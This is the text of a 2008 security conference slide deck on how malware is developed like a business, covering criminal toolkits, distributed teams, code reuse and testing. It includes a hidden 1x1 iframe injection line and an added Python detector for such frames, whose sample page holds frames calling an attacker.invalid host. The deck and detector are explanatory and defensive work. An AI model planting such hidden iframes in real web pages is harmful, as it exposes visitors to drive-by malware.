Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Professional Development Trends in Malware
Michael A. Davis
Chief Executive Officer
Savid Technologies, Inc.
http://www.savidtech.com
Agenda
» Who am I?
» State of the Union
» Development Trends
» Questions
About Savid
» Michael A. Davis - CEO
» Founded in 2003
» Chicago & DC Offices
» Think Tank of security professionals
» Diverse set of IT skill
» Unique, agile combination of expertise
» Cater to the special security needs of business
» We love what we do and will work hard to meet our clients' needs
Our focus is unique, high-end solutions. We do NOT provide “cookie-cutter” solutions because our clientele do not have “cookie-cutter” problems.
State of the Union
» “Protection” is in place…
– 98% use firewalls
– 97% of companies protect machines with antivirus software
– 79% use anti-spyware
– 61% use email monitoring software
» But it’s not enough…
– Cost of malware: $14.2B
– 80% of companies experienced 1 or more successful attacks, 30% had more than 10
– Worldwide, 32% of companies experience attacks involving business partners
– 43% of those were infections, while 27% were unauthorized access
– 75% of enterprises will be infected with malware that evaded traditional defenses
Sources: Computer Security Institute/FBI, 2006 Computer Crime and Security Survey; Computer Economics, 2006; ICSA Labs, 9th Annual Computer Virus Prevalence Survey; Cybertrust, Risky Business, September 2006; Gartner, Gartner’s Top Predictions for IT Organizations and Users, 2007 & Beyond, December 2006
The Problem - Continued
[Chart: Vulnerabilities reported per year; vertical axis 0 to 10000]
The Threat
» Highly organized crime. Their motive is Return on Investment.
» Fraud, identity theft and extortion have been going on for centuries. The Internet has made them exponentially profitable with minimal risk.
» Attacks are extremely sophisticated and one step ahead of defenses.
It’s a Business
"It’s very simple. We buy these products in Western countries with stolen credit cards. You don’t run any risk when purchasing these products."
Image Source: PandaSoftware at http://www.pandasoftware.com
The Tools
» Tools are being actively sold to automate criminal activity.
» These tools have manuals, updates, and even support.
» Price ranges from $20 - $3,000
» Russia is a breeding ground for the development and distribution.
Professional Interfaces
Image Source: PandaSoftware at http://www.pandasoftware.com
Malicious Websites
<iframe src=http://***/ex.php border=0 width=1 height=1></iframe>
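The injected 1x1 iframe above is the pattern a defender can scan saved HTML for. As an added example (not from the original deck), the following Python flags iframes that are effectively invisible (tiny or CSS-hidden) and load a host other than the page's own; the module and function names and the embedded sample page are assumptions constructed for the example.

```python
# Added example (not from the original deck): flag hidden iframes of the kind
# shown on the Malicious Websites slide, e.g. when scanning saved HTML.
from html.parser import HTMLParser
from urllib.parse import urlparse

TINY_PX = 2  # at or below this size the frame is invisible to the user


def _px(value):
    """Parse '1' or '1px' into an int; None for anything else (e.g. '100%')."""
    if value is None:
        return None
    v = value.strip().lower()
    v = v[:-2] if v.endswith("px") else v
    return int(v) if v.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # html.parser accepts unquoted values such as src=http://.../ex.php
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        w, h = _px(a.get("width")), _px(a.get("height"))
        hidden = ((w is not None and w <= TINY_PX)
                  or (h is not None and h <= TINY_PX)
                  or "display:none" in style
                  or "visibility:hidden" in style)
        src = a.get("src", "")
        src_host = (urlparse(src).hostname or "").lower()
        # Hidden frame pulling content from a third-party host: drive-by pattern.
        if hidden and src_host and src_host != self.page_host:
            self.findings.append({"src": src, "width": w, "height": h,
                                  "line": self.getpos()[0]})


def find_hidden_iframes(html, page_host):
    p = HiddenIframeFinder(page_host)
    p.feed(html)
    return p.findings


# Constructed sample: a normal page with two injected frames appended.
SAMPLE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width=300 height=200></iframe>
<iframe src=http://attacker.invalid/ex.php border=0 width=1 height=1></iframe>
<iframe src="http://attacker.invalid/x" style="display: none"></iframe>
</body></html>"""
```

Same-host hidden frames are deliberately not flagged, so legitimate tracking or layout frames on the site itself do not produce noise; each finding carries the line number for triage.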
Professional Development
» Money enables quality
» Teams of developers
» Funded by investors
– Must guarantee ROI
Open Source Development
» Different than traditional production
» Highly Distributed
» E-Mail as communication mechanism
» Various Tools
– Version Control
– Bug Tracking System – For Support
– Rudimentary Change Management
– No Project Plans
– Donated Resources/Time
– Contributors pick what they want to do
Multiple Contributors
» Virus/Trojan written by one author
» Initial malware written by single author
» Contributors join work on bug testing
» Most malware has 2-10 authors
» Other Contributors
– Host bug system
– Host testing forum
– Donate money
Feature Modifications
» No Project Plan
» Contributors work on what is “cool”
– Usually whatever is causing them pain
– E.g., P2P in response to botnet shutdowns
» Money
– Give priority to certain features
– Management Consoles are an example
» Malware Authors Create their own market
– Build frameworks that require customization
Module Reuse
» The Mythical Man-Month states that the silver bullet is Module Reuse
» Malware uses tons of Open Source Code
– OpenSSL
– Apache
– Pthreads
– Free Source Code
» This code has been tested and is high quality
» Malware frameworks are built upon this reused code
– Variants are the problem, not new species
Quality Testing
» Version Control enables rolling back of bad code/branches of code
» Follows Open Source “Build/Release” test framework
» New Releases are “Interrupt Driven”
– Only release new versions when the authors feel like it
» Authors hate to support their software
– Automatic update mechanisms
– Change Logs
– Documentation
What does this all mean?
» It is all about Return on Investment (ROI)
» Malware is staying longer on workstations
» Malware is taking longer to remove
– Multiple apps/reboots/etc
» Malware is becoming more stealthy within the OS
» Malware infections are more directed and have larger impact
Conclusion
» Thank you
» Michael A. Davis, [email protected], (708) 532-2843
» Questions?